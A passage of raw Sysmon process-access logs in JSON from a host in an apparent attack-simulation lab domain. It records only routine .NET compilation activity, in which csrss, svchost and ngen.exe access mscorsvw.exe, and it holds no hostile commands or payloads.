C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.386","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-001045E70C00}","TargetProcessId":"2392","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6695,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.386\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-001045E70C00}\r\nTargetProcessId: 2392\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.386","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-001045E70C00}","TargetProcessId":"2392","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6696,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.417\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010B6EA0C00}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.417","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010B6EA0C00}","TargetProcessId":"3288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6697,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.417\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010B6EA0C00}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.417","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010B6EA0C00}","TargetProcessId":"3288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6698,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.417\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010B6EA0C00}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.417","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010B6EA0C00}","TargetProcessId":"3288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6699,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.480\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0449-5F25-0000-00108D400C00}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.480","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0449-5F25-0000-00108D400C00}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6700,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.480\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0449-5F25-0000-00108D400C00}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.480","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0449-5F25-0000-00108D400C00}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6701,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.495\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-001009EF0C00}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.495","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-001009EF0C00}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6702,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.558\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-00109DF20C00}\r\nTargetProcessId: 1528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 